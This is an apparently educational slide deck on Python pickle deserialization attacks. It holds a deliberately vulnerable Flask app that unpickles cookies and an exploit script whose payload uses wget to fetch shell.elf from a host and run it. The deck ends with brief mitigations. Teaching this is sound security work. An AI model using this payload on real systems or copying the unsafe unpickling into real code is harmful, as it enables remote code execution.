Introduction to Deserialization Attacks

Deserialization Attacks

Ayush Priya VIT, Vellore @ayushpriya10 https://ayushpriya.com https://www.linkedin.com/in/ayushpriya10

Overview: • What is serialization? • Why do we serialize
stuff? • Demo • Mitigation

What is serialization? • Converting objects to storable data •
Also known as marshalling • Deserialization - retrieving objects from serial data

Why do we serialize stuff? • Interoperability • Transfer over
networks • Storage

An example..

import pickle import os class BadUserClass(): def __init__(self, username): self.username
= username def __reduce__(self): return (self.__class__, (os.system("whoami"),)) bad_user_obj = BadUserClass("ayush") serialized_obj = pickle.dumps(bad_user_obj) # Insecure deserialization user = pickle.loads(serialized_obj) print("Hello!, {}".format(user.username)) # Output: # desktop-fsv539h\ayush # Hello!, 0

A more realistic example..

# flask_app.py import os import pickle from uuid import uuid1
from flask import Flask, make_response, request from base64 import b64encode, b64decode # The User Class which assigns a random ID to each connection class UserID: def __init__(self, uuid=None): self.uuid = str(uuid1()) def __str__(self): return self.uuid # The main Flask Backend app = Flask(__name__) @app.route('/', methods=['GET']) def index(): obj = request.cookies.get('uuid') if obj == None: msg = "Seems like you didn't have a cookie. No worries! I'll set one now!" response = make_response(msg) obj = UserID() response.set_cookie('uuid', b64encode(pickle.dumps(obj))) return response else: return "Hey there! {}!".format(pickle.loads(b64decode(obj))) if __name__ == "__main__": app.run(host='0.0.0.0')

What we need to do? • Create a payload •
Serialize it, get Base64 value • Modify cookie’s value

# exploit.py import os import pickle from base64 import b64encode
PAYLOAD = "cd /tmp && wget http://10.0.2.15/shell.elf && chmod +x shell.elf && ./shell.elf" class Exploit(object): def __reduce__(self): return (eval, ("os.system('" + PAYLOAD + "')",)) exploit_code = pickle.dumps(Exploit()) print(b64encode(exploit_code)) # Output is: b'gANjYnVpbHRpbnMKZXZhbApxAFhcAAAAb3Muc3lzdGVtKCdjZCAvdG1wICYmIHdnZXQgaHR0cDovLzEwLjAuMi 4xNS9zaGVsbC5lbGYgJiYgY2htb2QgK3ggc2hlbGwuZWxmICYmIC4vc2hlbGwuZWxmJylxAYVxAlJxAy4='

Mitigation • Don’t deserialize data from untrusted source • Limited
access privileges • Safe deserialization methods

Thank You!

Introduction to Deserialization Attacks

Introduction to Deserialization Attacks

Ayush Priya

More Decks by Ayush Priya

Other Decks in Technology

Featured

Transcript

Deserialization Attacks

Ayush Priya VIT, Vellore @ayushpriya10 https://ayushpriya.com https://www.linkedin.com/in/ayushpriya10

Overview: • What is serialization? • Why do we serialize

What is serialization? • Converting objects to storable data •

Why do we serialize stuff? • Interoperability • Transfer over

An example..

import pickle import os class BadUserClass(): def init(self, username): self.username

A more realistic example..

# flask_app.py import os import pickle from uuid import uuid1

What we need to do? • Create a payload •

# exploit.py import os import pickle from base64 import b64encode

Mitigation • Don’t deserialize data from untrusted source • Limited

Thank You!